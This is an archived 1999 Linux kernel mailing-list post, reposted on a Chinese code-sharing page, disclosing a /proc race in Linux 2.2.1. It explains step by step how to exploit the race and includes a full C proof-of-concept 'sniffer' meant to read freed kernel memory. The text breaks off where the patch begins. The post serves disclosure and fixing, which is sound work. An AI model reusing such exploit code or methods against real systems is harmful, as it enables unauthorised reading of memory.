📄 proc race fixes for 2.2.1.txt

📁 当今
💻 TXT
📖 第 1 页 / 共 2 页
字号:
12 下一页
发信人: cloudsky (晓舟·轩辕明月), 信区: Security 

标  题: [patch] /proc race fixes for 2.2.1 

发信站: 武汉白云黄鹤站 (Wed Feb  3 22:10:10 1999) , 站内信件 

  

This is a short analysis I've done yesterday about the array.c 

(/proc/pid/...) races of Linux-2.2.0 and Linux-2.2.1. These races was 

leading to very easily reproducible crashes and Oopses in linux-2.2.0. But 

Linux-2.2.1 is not been completly fixed. There's still a potential race 

very hard to reproduce (I think you need at least a 3way smp). You can 

find a kind of /proc sniffer in this email. At the end of this email 

you'll find my complete fix for 2.2.1. 

  

The race if exploited can lead at least to reading data from random used 

memory. The memory that could be sniffed could contain any kind of useful 

data (userspace process memory, cache or whatever). It's not possible to 

grab the whole page but it's possible only to reproduce the contents of 

the memory reading and decoding the output of /proc. 

  

Maybe it's impossible to exploit the SMP race I am pointing out even if on 

3way smp because of timing issues, but there's no a lock that assures 

atomicity. 

  

Side note: I hope to have diffed all the interesting changes from my tree 

to 2.2.1 at the end of the email (I don't have the time to check). If for 

some reason the patch won't apply cleanly or will not work don't bother me 

in mass, but instead go in sync with my personal kernel tree to get this 

race fixed (I take it open just to allow other people to try it) at 

ftp://e-mind.com/pub/linux/arca-tree/2.2.1_arca-2.gz. My tree has also 

many other improvements, bugfix and features (not only developed by me, 

e.g.  the ieee1284-parport code developed by Tim Waugth) and can have any 

kind of bugs in it so ask me before use it for production (so I'll tell 

you what you have to remove to get it rock solid for sure). 

  

Andrea Arcangeli 

  

---------- Forwarded message ---------- 

Date: Tue, 2 Feb 1999 01:07:07 +0100 (CET) 

From: Andrea Arcangeli <andrea@e-mind.com> 

To: linux-kernel@vger.rutgers.edu 

Subject: [patch] /proc race fixes for 2.2.1 

  

2.2.1 reintroduced a SMP race in array.c. The SMP race is that wait(2) can 

free the kernel stack of the zombie process while array.c is using it. 

  

Once the page is freed it can be reused, and if it get recycled before 

array.c has finished to use it, you could reconstruct part of RAM that you 

should not be allowed to read (looking at /proc data) and array.c could 

get in problems during its lifetime (not checked this last but it's a 

guess). 

  

In practice the window for the race is small and I think you would need at 

least 3 CPU to reproduce this I think. 

  

The first CPU has to fork a process that will do only an _exit(2). Then 

has to wait that the forked process become a zombie, and once it's a 

zombie it has to start a /proc sniffer that will read /proc/zombiepid/stat 

on the other cpu. 

  

This sniffer will save its contents to a buffer at the first pass and then 

it will start reading /proc/../stat in loop and comparing it with the one 

saved in the buffer, and it will then log the output of /proc/../stat if 

it will be changed compared with the saved data sample in the buffer. 

  

Once the sniffer is at regime (the loop that search for /proc changes is 

started) the task on the first CPU (the one that forked the sniffer) has 

to do a wait(2) so that the stack of the zombie process will be released. 

  

A bit before doing the wait(2) you must eat all the memory avaliable with 

a trashing proggy and this last has to run in a new CPU (so you need at 

least a 3way smp). Since this last memory-trasher proggy will start 

allocing tons of memory, you'll have a chance that the pages freed by 

wait(2) will be realloced by the kernel before the read of the /proc 

sniffer will finish. 

  

It's theorically possible to sniff data from the kernel exploiting the 

/proc race but it's really hard and only on some very parallel hardware. 

  

I also written a sample of exploit (really ugly, I written it very fast 

and without thinking too much about it because I think to spend better my 

time in fixing the bug or writing useful code than in writing exploits.... 

and because I realizied that on the hardware I have here it would have 

never worked ;). 

  

/* 

 * Copyright (C) 1999  Andrea Arcangeli 

 * Linux-2.2.1 /proc SMP race sniffer 

 */ 

  

#include <stdio.h> 

#include <fcntl.h> 

#include <sched.h> 

#include <pthread.h> 

  

static volatile int pid = -1; 

static int prog_length; 

static pthread_mutex_t pid_lock = PTHREAD_MUTEX_INITIALIZER; 

static pthread_mutex_t zombie_lock = PTHREAD_MUTEX_INITIALIZER; 

  

static int get_current_pid(void) 

{ 

        int __pid; 

        pthread_mutex_lock(&pid_lock); 

        __pid = pid; 

        pthread_mutex_unlock(&pid_lock); 

        return __pid; 

} 

  

static void * sniffer(void *dummy) 

{ 

        int cache_pid = -1, fd = -1; 

        char str[50], buf[2000], sample[2000]; 

  

        pthread_mutex_lock(&zombie_lock); 

        pthread_mutex_unlock(&zombie_lock); 

  

        for (;;) 

        { 

                int length_cmp; 

                if (get_current_pid() != cache_pid) 

                { 

                        pthread_mutex_lock(&zombie_lock); 

                        cache_pid = pid; 

                        snprintf(str, 50, "/proc/%d/stat", cache_pid); 

                        if (fd > 0) 

                                close(fd); 

                        fd = open(str, O_RDONLY|O_NONBLOCK); 

                        if (fd > 0) 

                        { 

                                int length; 

                                length = read(fd, &buf, 2000); 

                                if (length > 0) 

                                { 

                                        length_cmp = length; 

                                        memcpy(sample, buf, length); 

                                        sample[length-1] = 0; 

                                } 

                        } 

                        pthread_mutex_unlock(&zombie_lock); 

                } 

  

                if (fd > 0) 

                { 

                        int length; 

  

                        lseek(fd, 0, SEEK_SET); 

                        length = read(fd, &buf, 200); 

                        buf[length-1] = 0; 

                        if (length >= length_cmp && memcmp(buf, sample, 

                                                           length_cmp)) 

                                printf("length %d, pid %d\n" 

                                       "original data: %s\n" 

                                       "modifyed data: %s\n", 

                                       length, cache_pid, sample, buf); 

                } 

        } 

} 

  

static int is_zombie(int __pid) 

{ 

        char str[50], state; 

        FILE * status; 

        snprintf(str, 50, "/proc/%d/status", __pid); 

        status = fopen(str, "r"); 

        if (!status) 

        { 

                perror("open"); 

                exit(2); 

        } 

        fscanf(status, "%*s\t%*s\nState:\t%c", &state); 

        fclose(status); 

        if (state != 'Z') 

                return 0; 

        return 1; 

} 

  

int main(int argc, char *argv[]) 

{ 

        int dummy; 

        pthread_t task_struct_sniffer; 

  

        pthread_mutex_lock(&zombie_lock); 

  

        if (pthread_create(&task_struct_sniffer, NULL, sniffer, NULL)) 

        { 

                perror("pthread_create"); 

                exit(1); 

        } 

  

        for (;;) 

        { 

                int __pid = fork(); 

                if (!__pid) 

                        _exit(0); 

  

                while (!is_zombie(__pid)); 

  

                pthread_mutex_lock(&pid_lock); 

                pid = __pid; 

                pthread_mutex_unlock(&pid_lock); 

  

                pthread_mutex_unlock(&zombie_lock); 

                usleep(1); 

                wait(&dummy); 

                pthread_mutex_lock(&zombie_lock); 

        } 

        pthread_mutex_unlock(&zombie_lock); 

} 

  

Probably it has also bugs (since I have no chance to make it working here 

I am not going to look at it further), I attached it here only in the case 

someone is interested on a exploit sample. BTW, is there a better way to 

know when the child is become a zombie than reading 

/proc/pidofchild/status ? I thought to catch the SIGCHILD signal but as 

first I was not sure that this way a wait() would be wakenup anyway (too 

lazy to check in signal.c ;), and as second with the /proc/xxx/status 

approch I had to write less code anyway and since it was a not performance 

critical piece of code I had no dubit of the way to take ;). 

  

I also understood very well the reason of the 2.2.0 oopses and process in 

D state. It was happening something like this: 

  

        `ps`                            tsk 

        -------------                   ----------------- 

        sys_read() 

        lock_kernel() 

                                        do_page_fault() 

        array_read() 

                                        down(tsk->mm) 

                                        find_vma() 

        get_process_array() 

                                        handle_mm_fault() 

                                        lock_kernel() /* woowoo so spin on 

                                                        the big kernel 

                                                        lock */ 

        get_stat() 

        grab_task() 

        down(tsk->mm) /* just owned by tsk */ 

        schedule() /* so release the big kernel lock */ 

                                        tsk gets the big kernel lock 

                                        here 

                                        finish the page fault 

                                        __up() 

                                        wake_up_process(`ps`) 

                                        many othe thing 

                                        execve() /* this is the harming */ 

                                        mmput(tsk->mm); 

                                        tsk->mm = mm_alloc(); (mm->count = 1) 

                                        finish execve... 

                                        .... everything he wants .... 

        now `ps` get rescheduled 

        and own the mm->semaphore 

        (of a mm_struct that is not 

        tsk->mm anymore) 

        release_task(tsk); 

        mmput(tsk->mm); (but mm->count was 1!!) 

        exit_mmap(); 

        zap_page_range() /* aieee! */ 

                                        at the first fault it will get 

                                        a mm = &init_mm !! 

  

Thinks like this can't happens in 2.2.0-pre9 just because tsk->mm was 

still referencing the old mm of the process (before the execve) because 

tsk->mm was a copy and not a runtime value. 

  

Obviously there was the stack overflow and performances problem in the 

(1) copy approch. 

  

So now I fixed all races with a zerocopy approch (originally suggested by 

Linus that increments the page count of the process stack instead of 

doing the copy, but it also assure that array.c always use the mm it has 

get before (with mmget())). 

  

Works fine here. Patch against 2.2.1: 

  

--- /tmp/array.c        Tue Feb  2 00:08:07 1999 

+++ linux/fs/proc/array.c       Mon Feb  1 23:51:51 1999
12 下一页
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -